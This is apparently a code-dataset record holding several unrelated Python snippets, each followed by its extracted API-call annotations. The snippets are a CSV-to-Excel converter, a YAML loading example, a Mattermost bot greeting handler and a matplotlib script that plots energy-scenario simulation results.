        sheet_name = os.path.basename(csv_path)
        # sheet name is the file name with a trailing '.csv' stripped
        if sheet_name.lower().endswith('.csv'):
            sheet_name = sheet_name[:-4]
        records = read_csv(csv_path)
        sheet = writer.add_sheet(sheet_name)
        for record in records:
            writer.append(sheet, record, translate_date)
    writer.save(excel_file)
def parse_arg():
    """Build the command-line parser and return the parsed arguments."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('-i', '--input-files', nargs='+', required=True,
                            help='input excel files')
    arg_parser.add_argument('-o', '--output-file', required=True,
                            help='output excel file')
    arg_parser.add_argument('-t', '--translate-date', action='store_true',
                            help='translate date string to excel date')
    return arg_parser.parse_args()
def main(argv):
    """Command-line entry point.

    *argv* is accepted for symmetry with ``sys.argv`` but parsing is
    delegated to :func:`parse_arg`, which reads ``sys.argv`` directly.
    Prints the error and exits with status 1 on any failure.
    """
    try:
        args = parse_arg()
        write_excel_from_csv(args.output_file, args.input_files, args.translate_date)
    except Exception as e:
        print(e, file=sys.stderr)
        # sys.exit is always available; the exit() builtin is injected by the
        # site module and may be absent in embedded/optimized interpreters
        sys.exit(1)
if __name__ == "__main__":
    # argv is passed through for symmetry; parse_arg() reads sys.argv itself
    main(sys.argv)
| [
"datetime.datetime",
"dateutil.parser.parse",
"dateutil.parser.parse_args",
"datetime.time",
"argparse.ArgumentParser",
"xlwt.XFStyle",
"dateutil.parser.add_argument",
"openpyxl.Workbook",
"csv.reader",
"os.path.basename",
"datetime.date",
"xlwt.Workbook",
"re.search"
] | [((4395, 4420), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (4418, 4420), False, 'import argparse\n'), ((4425, 4524), 'dateutil.parser.add_argument', 'parser.add_argument', (['"""-i"""', '"""--input-files"""'], {'nargs': '"""+"""', 'required': '(True)', 'help': '"""input excel files"""'}), "('-i', '--input-files', nargs='+', required=True, help=\n 'input excel files')\n", (4444, 4524), False, 'from dateutil import parser\n'), ((4596, 4684), 'dateutil.parser.add_argument', 'parser.add_argument', (['"""-o"""', '"""--output-file"""'], {'required': '(True)', 'help': '"""output excel file"""'}), "('-o', '--output-file', required=True, help=\n 'output excel file')\n", (4615, 4684), False, 'from dateutil import parser\n'), ((4732, 4847), 'dateutil.parser.add_argument', 'parser.add_argument', (['"""-t"""', '"""--translate-date"""'], {'action': '"""store_true"""', 'help': '"""translate date string to excel date"""'}), "('-t', '--translate-date', action='store_true', help=\n 'translate date string to excel date')\n", (4751, 4847), False, 'from dateutil import parser\n'), ((4903, 4922), 'dateutil.parser.parse_args', 'parser.parse_args', ([], {}), '()\n', (4920, 4922), False, 'from dateutil import parser\n'), ((536, 551), 'xlwt.Workbook', 'xlwt.Workbook', ([], {}), '()\n', (549, 551), False, 'import xlwt\n'), ((1964, 1983), 'openpyxl.Workbook', 'openpyxl.Workbook', ([], {}), '()\n', (1981, 1983), False, 'import openpyxl\n'), ((3688, 3701), 'csv.reader', 'csv.reader', (['f'], {}), '(f)\n', (3698, 3701), False, 'import csv\n'), ((3886, 3914), 'os.path.basename', 'os.path.basename', (['excel_file'], {}), '(excel_file)\n', (3902, 3914), False, 'import os\n'), ((4045, 4071), 'os.path.basename', 'os.path.basename', (['csv_file'], {}), '(csv_file)\n', (4061, 4071), False, 'import os\n'), ((2691, 2733), 'dateutil.parser.parse', 'parser.parse', (['stripped_data'], {'ignoretz': '(True)'}), '(stripped_data, ignoretz=True)\n', (2703, 2733), False, 'from 
dateutil import parser\n'), ((2779, 2845), 're.search', 're.search', (['"""\\\\d+:[0-5][0-9](:[0-5][0-9](.\\\\d+)?)?$"""', 'stripped_data'], {}), "('\\\\d+:[0-5][0-9](:[0-5][0-9](.\\\\d+)?)?$', stripped_data)\n", (2788, 2845), False, 'import re\n'), ((966, 980), 'xlwt.XFStyle', 'xlwt.XFStyle', ([], {}), '()\n', (978, 980), False, 'import xlwt\n'), ((3461, 3501), 'datetime.date', 'datetime.date', (['dt.year', 'dt.month', 'dt.day'], {}), '(dt.year, dt.month, dt.day)\n', (3474, 3501), False, 'import datetime\n'), ((1249, 1263), 'xlwt.XFStyle', 'xlwt.XFStyle', ([], {}), '()\n', (1261, 1263), False, 'import xlwt\n'), ((3097, 3157), 'datetime.time', 'datetime.time', (['dt.hour', 'dt.minute', 'dt.second', 'dt.microsecond'], {}), '(dt.hour, dt.minute, dt.second, dt.microsecond)\n', (3110, 3157), False, 'import datetime\n'), ((3275, 3370), 'datetime.datetime', 'datetime.datetime', (['dt.year', 'dt.month', 'dt.day', 'dt.hour', 'dt.minute', 'dt.second', 'dt.microsecond'], {}), '(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second,\n dt.microsecond)\n', (3292, 3370), False, 'import datetime\n'), ((1513, 1527), 'xlwt.XFStyle', 'xlwt.XFStyle', ([], {}), '()\n', (1525, 1527), False, 'import xlwt\n')] |
import yaml
# YAML document describing the example application (package.json-style
# project metadata for a Kivy build).
document = """
"name": "example_app"
"version": "1.0.0"
"main": "example_app/main.py"
"description": "A example structure for building projects cross-platform using kivy"
"license": "MIT"
"repository":
"type": "git"
"url": "<EMAIL>:VictorManhani/kivy_build.git"
"engines":
"python": "3.7.7"
"kivy": "1.11.1"
"modules":
"example_app/kivy_modules"
"""

# safe_load avoids arbitrary Python object construction from the document;
# yaml.load() without an explicit Loader is unsafe and rejected by PyYAML >= 6
a = yaml.safe_load(document)

a['files'] = "hello"
print(a)
"yaml.load"
] | [((388, 407), 'yaml.load', 'yaml.load', (['document'], {}), '(document)\n', (397, 407), False, 'import yaml\n')] |
# -*- coding: utf-8 -*-
import re
from mattermost_bot.bot import respond_to
@respond_to('(.*) added to the channel by (.*)', re.IGNORECASE)
def added_to_channel(message, myname, channel_admin):
    # The two regex capture groups are presumably bound to *myname* (the bot)
    # and *channel_admin* (who added it) by respond_to -- confirm against the
    # mattermost_bot dispatch. Greets the channel on join.
    message.reply('Hi, %s. I am %s. Glad to join this channel :) ' % (channel_admin, myname))
# Assigned after decoration so the docstring lands on the decorated handler
# object that the framework introspects.
added_to_channel.__doc__ = "Response when added to a channel"
| [
"mattermost_bot.bot.respond_to"
] | [((81, 143), 'mattermost_bot.bot.respond_to', 'respond_to', (['"""(.*) added to the channel by (.*)"""', 're.IGNORECASE'], {}), "('(.*) added to the channel by (.*)', re.IGNORECASE)\n", (91, 143), False, 'from mattermost_bot.bot import respond_to\n')] |
# coding=utf-8
import sys
import os
import csv
from datetime import datetime, timedelta
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.dates import drange
from matplotlib.patches import Rectangle
import scenario_factory
# http://www.javascripter.net/faq/hextorgb.htm
# Color palette as RGB fractions (hex values converted per the page cited
# above); PRIM* are shades of the primary blue used throughout the plots.
PRIMA = (148/256, 164/256, 182/256)
PRIMB = (101/256, 129/256, 164/256)
PRIM  = ( 31/256,  74/256, 125/256)
PRIMC = ( 41/256,  65/256,  94/256)
PRIMD = ( 10/256,  42/256,  81/256)
# EC is a fully transparent RGBA edge color used for fills/spans.
EC = (1, 1, 1, 0)
GRAY = (0.5, 0.5, 0.5)
WHITE = (1, 1, 1)
def load(f):
    """Load an .npz archive and stack its arrays (in sorted key order)
    into a single ndarray."""
    with np.load(f) as archive:
        stacked = np.array([archive[key] for key in sorted(archive.keys())])
    return stacked
def plot_aggregated(sc, bd, unctrl, ctrl, ctrl_sched, res=1):
    """Plot aggregated electrical power (top axis) and storage temperatures
    (bottom axis) for a scenario and return the matplotlib Figure.

    sc: scenario object providing t_start/t_end/t_block_start/t_block_end
        and the target 'block' profile.
    unctrl/ctrl: per-device arrays indexed [device, quantity, time]; index 0
        along the quantity axis is electrical power, index 2 is storage
        temperature in Kelvin (converted with '- 273' below).
    ctrl_sched: per-device scheduled electrical power, [device, time].
    res: time resolution in minutes.
    NOTE(review): *bd* is unused here; the integer-division indexing
    (e.g. t[len(t)/2]) is Python-2 semantics -- confirm this module
    targets Python 2.
    """
    # midnight of the day the control block starts on
    t_day_start = sc.t_block_start - timedelta(hours=sc.t_block_start.hour,
                                              minutes=sc.t_block_start.minute)
    t = drange(t_day_start, sc.t_end, timedelta(minutes=res))
    # sample offsets relative to the minute-resolution time axis
    skip = (t_day_start - sc.t_start).total_seconds() / 60 / res
    i_block_start = (sc.t_block_start - t_day_start).total_seconds() / 60 / res
    i_block_end = (sc.t_block_end - t_day_start).total_seconds() / 60 / res
    # aggregate electrical power over all devices (quantity index 0)
    P_el_unctrl = unctrl[:,0,skip:].sum(0)
    P_el_ctrl = ctrl[:,0,skip:].sum(0)
    P_el_sched = ctrl_sched[:,skip:].sum(0)
    # target profile: sc.block is broadcast onto the unmasked (scheduled)
    # samples, repeated 15x when given per 15-minute block
    P_el_target = np.ma.array(P_el_sched)
    block = np.array(sc.block)
    if block.shape == (1,):
        block = block.repeat(P_el_target[~P_el_target.mask].shape[0])
    elif block.shape[0] == P_el_target[~P_el_target.mask].shape[0] / 15:
        block = block.repeat(15)
    P_el_target[~P_el_target.mask] = block
    # storage temperature per device (quantity index 2, Kelvin)
    T_storage_ctrl = ctrl[:,2,skip:]
    # duplicate interior samples so fill_between draws step-wise
    ft = np.array([t[0]] + list(np.repeat(t[1:-1], 2)) + [t[-1]])
    P_el_ctrl_fill = np.repeat(P_el_ctrl[:-1], 2)
    fig, ax = plt.subplots(2, sharex=True)
    fig.subplots_adjust(left=0.105, right=0.998, hspace=0.3, top=0.975, bottom=0.2)
    for a in ax:
        plt.setp(list(a.spines.values()), color='k')
        plt.setp([a.get_xticklines(), a.get_yticklines()], color='k')
    ax[0].set_ylabel('P$_{\mathrm{el}}$ [kW]')
    # y-limits padded 10% beyond the extreme curves (in kW)
    ymax = max(P_el_unctrl.max(), P_el_ctrl_fill.max(), P_el_sched.max(), 0) / 1000.0
    ymin = min(P_el_unctrl.min(), P_el_ctrl_fill.min(), P_el_sched.min(), 0) / 1000.0
    ax[0].set_ylim(ymin - abs(ymin * 0.1), ymax + abs(ymax * 0.1))
    xspace = (t[-1] - t[-2])
    # ax[0].set_xlim(t[0], t[-1] + xspace)
    ax[0].set_xlim(t[0], t[len(t)/2])
    # ax[0].axvline(t[i_block_start], ls='--', color='0.5')
    # ax[0].axvline(t[i_block_end], ls='--', color='0.5')
    # shade the control-block interval
    ax[0].axvspan(t[i_block_start], t[i_block_end], fc=GRAY+(0.2,), ec=EC)
    # ax[0].axvline(t[0], ls='-', color=GRAY, lw=0.5)
    # ax[0].axvline(t[len(t)/2], ls='-', color=GRAY, lw=0.5)
    l_unctrl, = ax[0].plot_date(t, P_el_unctrl / 1000.0, fmt=':', color='k', drawstyle='steps-post', lw=0.75)
    l_unctrl.set_dashes([1.0, 1.0])
    # add lw=0.0 due to bug in mpl (will show as hairline in pdf though...)
    l_ctrl = ax[0].fill_between(ft, P_el_ctrl_fill / 1000.0, facecolors=GRAY+(0.75,), edgecolors=EC, lw=0.0)
    # Create proxy artist as l_ctrl legend handle
    l_ctrl_proxy = Rectangle((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.5)
    # l_sched, = ax[0].plot_date(t, P_el_sched / 1000.0, fmt='-', color=GRAY, drawstyle='steps-post', lw=0.75)
    l_target, = ax[0].plot_date(t, P_el_target / 1000.0, fmt='-', color='k', drawstyle='steps-post', lw=0.75)
    # colors = [
    #     '#348ABD', # blue
    #     '#7A68A6', # purple
    #     '#A60628', # red
    #     '#467821', # green
    #     '#CF4457', # pink
    #     '#188487', # turqoise
    #     '#E24A33', # orange
    #     '#1F4A7D', # primary
    #     '#BF9D23', # secondary
    #     '#BF5B23', # complementary
    #     '#94A4B6', # primaryA
    #     '#6581A4', # primaryB
    #     '#29415E', # primaryC
    #     '#0A2A51', # primaryD
    # ][:len(unctrl)]
    # for (c, P_el_unctrl, P_el_ctrl, P_el_sched) in zip(colors, unctrl[:,0,:], ctrl[:,0,:], ctrl_sched):
    #     ax[0].plot_date(t, P_el_unctrl / 1000.0, fmt='-', color=c, lw=1, label='unctrl')
    #     ax[0].plot_date(t, P_el_ctrl / 1000.0, fmt=':', color=c, lw=1, label='ctrl')
    #     ax[0].plot_date(t, P_el_sched / 1000.0, fmt='--x', color=c, lw=1, label='sched')
    # bottom axis: storage temperatures in degrees Celsius, padded 1%
    ymax = T_storage_ctrl.max() - 273
    ymin = T_storage_ctrl.min() - 273
    ax[1].set_ylim(ymin - abs(ymin * 0.01), ymax + abs(ymax * 0.01))
    ax[1].set_ylabel('T$_{\mathrm{storage}}\;[^{\circ}\mathrm{C}]$', labelpad=9)
    ax[1].axvspan(t[i_block_start], t[i_block_end], fc=GRAY+(0.1,), ec=EC)
    # ax[1].axvline(t[0], ls='-', color=GRAY, lw=0.5)
    # ax[1].axvline(t[len(t)/2], ls='-', color=GRAY, lw=0.5)
    for v in T_storage_ctrl:
        ax[1].plot_date(t, v - 273.0, fmt='-', color=GRAY, alpha=0.25, lw=0.5)
    # HP and CHP have different temperature ranges (HP: 40-50, CHP: 50-70)
    crit = (T_storage_ctrl - 273 >= 50).all(axis=1)
    T_CHP = T_storage_ctrl[crit]
    T_HP = T_storage_ctrl[~crit]
    l_T_med_CHP, = ax[1].plot_date(t, T_CHP.mean(0) - 273.0, fmt='-', color=GRAY, alpha=0.75, lw=1.5)
    l_T_med_HP, = ax[1].plot_date(t, T_HP.mean(0) - 273.0, fmt='-', color=GRAY, alpha=0.75, lw=1.5)
    # hour:minute ticks on the shared time axis
    ax[0].xaxis.get_major_formatter().scaled[1/24.] = '%H:%M'
    ax[-1].set_xlabel('Time of day')
    fig.autofmt_xdate()
    ax[1].legend([l_target, l_unctrl, l_ctrl_proxy, l_T_med_CHP],
                 ['target', 'original', 'scheduled', 'storage temperatures (mean)'],
                 bbox_to_anchor=(0., 1.03, 1., .103), loc=8, ncol=4,
                 handletextpad=0.2, mode='expand', handlelength=3,
                 borderaxespad=0.25, fancybox=False, fontsize='x-small')
    # import pdb
    # pdb.set_trace()
    return fig
def plot_aggregated_SLP(sc, bd, unctrl, ctrl, ctrl_sched, res=1):
    """Plot aggregated unit profiles against the standard load profile (SLP).

    Top axes: aggregated electrical power of the simulated units (original
    vs. scheduled operation) during the scheduled block.  Bottom axes: the
    medium-voltage node's SLP and the profile resulting from the schedule.

    Parameters
    ----------
    sc : scenario object; must provide ``slp_file``, ``t_start``,
        ``t_block_start`` and ``t_block_end``.
    bd : base directory, forwarded to ``_read_slp``.
    unctrl, ctrl : simulation data indexed as ``[unit, series, time]``
        (series 0 presumably is electrical power -- confirm with producer).
        ``ctrl`` is accepted for interface compatibility but is not used
        in this plot.
    ctrl_sched : schedule data indexed as ``[unit, time]``.
    res : int
        Sample resolution of the data in minutes.

    Returns
    -------
    The created matplotlib figure.
    """
    assert hasattr(sc, 'slp_file')
    # Midnight of the day in which the block starts.
    t_day_start = sc.t_block_start - timedelta(hours=sc.t_block_start.hour,
                                             minutes=sc.t_block_start.minute)
    # Sample offsets; cast to int because they are used as array indices
    # and true division yields floats (TypeError on Python 3 otherwise).
    skip = int((t_day_start - sc.t_start).total_seconds() / 60 / res)
    i_block_start = int((sc.t_block_start - t_day_start).total_seconds() / 60 / res)
    i_block_end = int((sc.t_block_end - t_day_start).total_seconds() / 60 / res)
    t = drange(sc.t_block_start, sc.t_block_end, timedelta(minutes=res))
    sl = slice(skip + i_block_start, skip + i_block_end)
    P_el_unctrl = unctrl[:, 0, sl].sum(0)
    P_el_sched = ctrl_sched[:, sl].sum(0)
    slp = _read_slp(sc, bd)[sl]
    # Difference between scheduled and original operation in kW; this is
    # what the schedule adds to (or removes from) the node profile.
    diff_ctrl = (P_el_sched - P_el_unctrl) / 1000.0
    # "Filled" variants: every interior sample doubled so fill_between()
    # follows the steps-post line style of the plotted curves.
    diff_ctrl_fill = np.repeat((slp + diff_ctrl)[:-1], 2)
    slp_fill = np.repeat(slp[:-1], 2)
    ft = np.array([t[0]] + list(np.repeat(t[1:-1], 2)) + [t[-1]])
    P_el_ctrl_fill = np.repeat(P_el_sched[:-1], 2)

    fig, ax = plt.subplots(2, sharex=True)
    fig.subplots_adjust(left=0.11, right=0.998, hspace=0.2, top=0.95)
    for a in ax:
        plt.setp(list(a.spines.values()), color='k')
        plt.setp([a.get_xticklines(), a.get_yticklines()], color='k')

    # --- top axes: aggregated unit profiles -----------------------------
    ax[0].set_ylabel('P$_{\mathrm{el}}$ [kW]')
    ymax = max(P_el_unctrl.max(), P_el_ctrl_fill.max(), P_el_sched.max(), 0) / 1000.0
    ymin = min(P_el_unctrl.min(), P_el_ctrl_fill.min(), P_el_sched.min(), 0) / 1000.0
    ax[0].set_ylim(ymin - abs(ymin * 0.1), ymax + abs(ymax * 0.1))
    xspace = (t[-1] - t[-2])
    ax[0].set_xlim(t[0], t[-1] + xspace)
    l_unctrl, = ax[0].plot_date(t, P_el_unctrl / 1000.0, fmt=':', color='k',
                                drawstyle='steps-post', lw=0.75, label='original')
    l_unctrl.set_dashes([1.0, 1.0])
    # lw=0.0 works around an mpl bug (will show as hairline in pdf though...)
    ax[0].fill_between(ft, P_el_ctrl_fill / 1000.0, facecolors=GRAY + (0.75,),
                       edgecolors=EC, lw=0.0)
    # Proxy artist used as legend handle for the filled area.
    l_ctrl_proxy = Rectangle((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.5)

    # --- bottom axes: medium-voltage node profile -----------------------
    ax[1].set_ylabel('P$_{el}$ [kW]')
    ax[1].set_xlabel('Time of day')
    ymin = min(slp.min(), (slp + diff_ctrl).min())
    ax[1].set_ylim(ymin + (ymin * 0.1), 0)
    l_unctrl_slp, = ax[1].plot_date(t, slp, fmt=':', color='k',
                                    drawstyle='steps-post', lw=0.75, label='original')
    l_unctrl_slp.set_dashes([1.0, 1.0])
    ax[1].fill_between(ft, diff_ctrl_fill, slp_fill,
                       where=diff_ctrl_fill >= slp_fill,
                       facecolors=GRAY + (0.3,), edgecolors=EC, lw=0.0)
    ax[1].fill_between(ft, diff_ctrl_fill, slp_fill,
                       where=diff_ctrl_fill < slp_fill,
                       facecolors=GRAY + (0.3,), edgecolors=EC, lw=0.0)
    # Proxy artist used as legend handle for the difference area.
    l_diff_slp_proxy = Rectangle((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.3)
    l_ctrl_slp, = ax[1].plot_date(t, slp + diff_ctrl, fmt='-', color='k',
                                  drawstyle='steps-post', lw=0.75, label='scheduled')

    ax[0].text(0.5, 1.05, 'Profile of the units under control', ha='center', va='center',
               fontsize='small', transform=ax[0].transAxes)
    ax[1].text(0.5, 1.05, 'Profile of the medium-voltage node', ha='center', va='center',
               fontsize='small', transform=ax[1].transAxes)
    ax[0].legend([l_unctrl, l_ctrl_proxy], ['original', 'scheduled'],
                 loc='upper right', fancybox=False, fontsize='x-small')
    ax[1].legend([l_unctrl_slp, l_ctrl_slp, l_diff_slp_proxy],
                 ['original', 'scheduled', 'difference'],
                 loc='upper right', fancybox=False, fontsize='x-small')

    fig.autofmt_xdate()
    ax[0].xaxis.get_major_formatter().scaled[1 / 24.] = '%H:%M'
    return fig
def norm(minimum, maximum, value):
    """Scale *value* linearly into [0, 1] relative to [minimum, maximum].

    For a degenerate range (``maximum == minimum``) the value *maximum*
    is returned unchanged to avoid division by zero.
    """
    span = maximum - minimum
    if span == 0:
        return maximum
    return (value - minimum) / span
def _read_slp(sc, bd):
    """Read the standard load profile (SLP) referenced by ``sc.slp_file``.

    The CSV file (latin-1, ';'-separated) is skipped until a row starting
    with 'Datum' is found; after that, rows are parsed as
    ``date;time;value`` with German decimal commas.  Rows before
    ``sc.t_start`` are ignored, reading stops at ``sc.t_end``.  The
    profile is a demand, so values are stored with negative sign.
    Finally the series is scaled so that its mean magnitude matches the
    medium-voltage node's mean 15-minute consumption.

    ``bd`` is unused but kept for interface compatibility.
    Returns a numpy array of scaled (negative) power values.
    """
    values = []
    header_seen = False
    with open(sc.slp_file, 'r', encoding='latin-1') as f:
        for row in csv.reader(f, delimiter=';'):
            if not row:
                continue
            if not header_seen:
                if row[0] == 'Datum':
                    header_seen = True
                continue
            date = datetime.strptime('_'.join(row[:2]), '%d.%m.%Y_%H:%M:%S')
            if date < sc.t_start:
                continue
            if date >= sc.t_end:
                break
            # This is a demand, so negate the values.
            values.append(-1.0 * float(row[2].replace(',', '.')))
    slp = np.array(values)
    MS_day_mean = 13600     # kWh, derived from SmartNord Scenario document
    MS_15_mean = MS_day_mean / 96
    return slp / np.abs(slp.mean()) * MS_15_mean
def p(basedir, fn):
    """Return *fn* joined onto *basedir* with the OS path separator."""
    return os.path.join(basedir, fn)
def resample(d, resolution):
    """Downsample the innermost axis of *d* by averaging groups of
    ``resolution`` consecutive samples.

    The last axis length must be divisible by ``resolution`` (reshape
    raises otherwise).  All leading axes are preserved.
    """
    groups = int(d.shape[-1] / resolution)
    grouped_shape = tuple(d.shape[:-1]) + (groups, resolution)
    return d.reshape(grouped_shape).sum(-1) / resolution
def run(sc_file):
    """Load a scenario JSON file, assemble the simulation results and
    produce the aggregated result plot, saved next to the scenario as
    PDF and PNG.

    Chooses between the SLP plot (if the scenario defines ``slp_file``)
    and the storage-temperature plot otherwise, resampling the data to
    the resolution each plot expects.
    """
    print()
    bd = os.path.dirname(sc_file)
    sc = scenario_factory.Scenario()
    sc.load_JSON(sc_file)
    print(sc.title)
    # Load simulation data: uncontrolled baseline, controlled block phase,
    # post-block phase and the negotiated schedules.
    unctrl = load(p(bd, sc.run_unctrl_datafile))
    block = load(p(bd, sc.run_ctrl_datafile))
    post = load(p(bd, sc.run_post_datafile))
    sched = load(p(bd, sc.sched_file))
    # Concatenate block and post phases into one controlled timeline.
    ctrl = np.zeros(unctrl.shape)
    idx = 0
    for part in (block, post):
        ctrl[:, :, idx:idx + part.shape[-1]] = part
        idx += part.shape[-1]

    if sched.shape[-1] == unctrl.shape[-1] / 15:
        print('Extending schedules shape by factor 15')
        sched = sched.repeat(15, axis=1)
    t_start, b_start, b_end = sc.t_start, sc.t_block_start, sc.t_block_end
    # Determine the schedule resolution (minutes per sample).
    div = 1
    if (b_end - t_start).total_seconds() / 60 == sched.shape[-1] * 15:
        div = 15
    elif (b_end - t_start).total_seconds() / 60 == sched.shape[-1] * 60:
        div = 60
    # Cast to int: these are used as array indices and true division
    # yields floats (TypeError on Python 3 otherwise).
    b_s = int((b_start - sc.t_start).total_seconds() / 60 / div)
    b_e = int((b_end - sc.t_start).total_seconds() / 60 / div)
    # Masked schedule array: only the block interval carries data.
    ctrl_sched = np.zeros((unctrl.shape[0], unctrl.shape[-1]))
    ctrl_sched = np.ma.array(ctrl_sched)
    ctrl_sched[:, :b_s] = np.ma.masked
    ctrl_sched[:, b_s:b_e] = sched[:, b_s:b_e]
    ctrl_sched[:, b_e:] = np.ma.masked

    minutes = (sc.t_end - sc.t_start).total_seconds() / 60
    assert unctrl.shape[-1] == ctrl.shape[-1] == ctrl_sched.shape[-1]
    shape = unctrl.shape[-1]
    if hasattr(sc, 'slp_file'):
        # SLP plot expects 15-minute resolution.
        if minutes == shape:
            print('data is 1-minute resolution, will be resampled by 15')
            res = 15
        elif minutes == shape * 15:
            print('data is 15-minute resolution, all fine')
            res = 1
        else:
            raise RuntimeError('unsupported data resolution: %.2f' % (minutes / shape))
        unctrl = resample(unctrl, res)
        ctrl = resample(ctrl, res)
        ctrl_sched = resample(ctrl_sched, res)
        fig = plot_aggregated_SLP(sc, bd, unctrl, ctrl, ctrl_sched, res=15)
    else:
        # Aggregated plot expects 60-minute resolution.
        if minutes == shape:
            print('data is 1-minute resolution, will be resampled by 60')
            res = 60
        elif minutes == shape * 15:
            print('data is 15-minute resolution, will be resampled by 4')
            res = 4
        elif minutes == shape * 60:
            print('data is 60-minute resolution, all fine')
            res = 1
        else:
            raise RuntimeError('unsupported data resolution: %.2f' % (minutes / shape))
        unctrl = resample(unctrl, res)
        ctrl = resample(ctrl, res)
        ctrl_sched = resample(ctrl_sched, res)
        fig = plot_aggregated(sc, bd, unctrl, ctrl, ctrl_sched, res=60)
    fig.savefig(p(bd, sc.title) + '.pdf')
    fig.savefig(p(bd, sc.title) + '.png', dpi=300)
    plt.show()
if __name__ == '__main__':
    # Each CLI argument is either a scenario JSON file or a directory
    # containing one named '0.json'.
    for arg in sys.argv[1:]:
        run(p(arg, '0.json') if os.path.isdir(arg) else arg)
| [
"matplotlib.patches.Rectangle",
"numpy.repeat",
"numpy.roll",
"numpy.ma.array",
"os.path.join",
"numpy.array",
"os.path.dirname",
"numpy.zeros",
"os.path.isdir",
"datetime.timedelta",
"numpy.load",
"csv.reader",
"matplotlib.pyplot.subplots",
"scenario_factory.Scenario",
"matplotlib.pyplo... | [((1295, 1318), 'numpy.ma.array', 'np.ma.array', (['P_el_sched'], {}), '(P_el_sched)\n', (1306, 1318), True, 'import numpy as np\n'), ((1331, 1349), 'numpy.array', 'np.array', (['sc.block'], {}), '(sc.block)\n', (1339, 1349), True, 'import numpy as np\n'), ((1723, 1751), 'numpy.repeat', 'np.repeat', (['P_el_ctrl[:-1]', '(2)'], {}), '(P_el_ctrl[:-1], 2)\n', (1732, 1751), True, 'import numpy as np\n'), ((1767, 1795), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {'sharex': '(True)'}), '(2, sharex=True)\n', (1779, 1795), True, 'import matplotlib.pyplot as plt\n'), ((3124, 3185), 'matplotlib.patches.Rectangle', 'Rectangle', (['(0, 0)', '(1)', '(1)'], {'fc': 'GRAY', 'ec': 'WHITE', 'lw': '(0.0)', 'alpha': '(0.5)'}), '((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.5)\n', (3133, 3185), False, 'from matplotlib.patches import Rectangle\n'), ((6634, 6664), 'numpy.roll', 'np.roll', (['P_el_ctrl', '(-1)'], {'axis': '(0)'}), '(P_el_ctrl, -1, axis=0)\n', (6641, 6664), True, 'import numpy as np\n'), ((7010, 7046), 'numpy.repeat', 'np.repeat', (['(slp + diff_ctrl)[:-1]', '(2)'], {}), '((slp + diff_ctrl)[:-1], 2)\n', (7019, 7046), True, 'import numpy as np\n'), ((7062, 7084), 'numpy.repeat', 'np.repeat', (['slp[:-1]', '(2)'], {}), '(slp[:-1], 2)\n', (7071, 7084), True, 'import numpy as np\n'), ((7225, 7254), 'numpy.repeat', 'np.repeat', (['P_el_sched[:-1]', '(2)'], {}), '(P_el_sched[:-1], 2)\n', (7234, 7254), True, 'import numpy as np\n'), ((7270, 7298), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {'sharex': '(True)'}), '(2, sharex=True)\n', (7282, 7298), True, 'import matplotlib.pyplot as plt\n'), ((8285, 8346), 'matplotlib.patches.Rectangle', 'Rectangle', (['(0, 0)', '(1)', '(1)'], {'fc': 'GRAY', 'ec': 'WHITE', 'lw': '(0.0)', 'alpha': '(0.5)'}), '((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.5)\n', (8294, 8346), False, 'from matplotlib.patches import Rectangle\n'), ((10185, 10246), 'matplotlib.patches.Rectangle', 'Rectangle', 
(['(0, 0)', '(1)', '(1)'], {'fc': 'GRAY', 'ec': 'WHITE', 'lw': '(0.0)', 'alpha': '(0.3)'}), '((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.3)\n', (10194, 10246), False, 'from matplotlib.patches import Rectangle\n'), ((12270, 12283), 'numpy.array', 'np.array', (['slp'], {}), '(slp)\n', (12278, 12283), True, 'import numpy as np\n'), ((12793, 12818), 'os.path.join', 'os.path.join', (['basedir', 'fn'], {}), '(basedir, fn)\n', (12805, 12818), False, 'import os\n'), ((13064, 13088), 'os.path.dirname', 'os.path.dirname', (['sc_file'], {}), '(sc_file)\n', (13079, 13088), False, 'import os\n'), ((13098, 13125), 'scenario_factory.Scenario', 'scenario_factory.Scenario', ([], {}), '()\n', (13123, 13125), False, 'import scenario_factory\n'), ((13463, 13485), 'numpy.zeros', 'np.zeros', (['unctrl.shape'], {}), '(unctrl.shape)\n', (13471, 13485), True, 'import numpy as np\n'), ((14144, 14189), 'numpy.zeros', 'np.zeros', (['(unctrl.shape[0], unctrl.shape[-1])'], {}), '((unctrl.shape[0], unctrl.shape[-1]))\n', (14152, 14189), True, 'import numpy as np\n'), ((14207, 14230), 'numpy.ma.array', 'np.ma.array', (['ctrl_sched'], {}), '(ctrl_sched)\n', (14218, 14230), True, 'import numpy as np\n'), ((15903, 15913), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (15911, 15913), True, 'import matplotlib.pyplot as plt\n'), ((555, 565), 'numpy.load', 'np.load', (['f'], {}), '(f)\n', (562, 565), True, 'import numpy as np\n'), ((753, 824), 'datetime.timedelta', 'timedelta', ([], {'hours': 'sc.t_block_start.hour', 'minutes': 'sc.t_block_start.minute'}), '(hours=sc.t_block_start.hour, minutes=sc.t_block_start.minute)\n', (762, 824), False, 'from datetime import datetime, timedelta\n'), ((904, 926), 'datetime.timedelta', 'timedelta', ([], {'minutes': 'res'}), '(minutes=res)\n', (913, 926), False, 'from datetime import datetime, timedelta\n'), ((6038, 6109), 'datetime.timedelta', 'timedelta', ([], {'hours': 'sc.t_block_start.hour', 'minutes': 'sc.t_block_start.minute'}), 
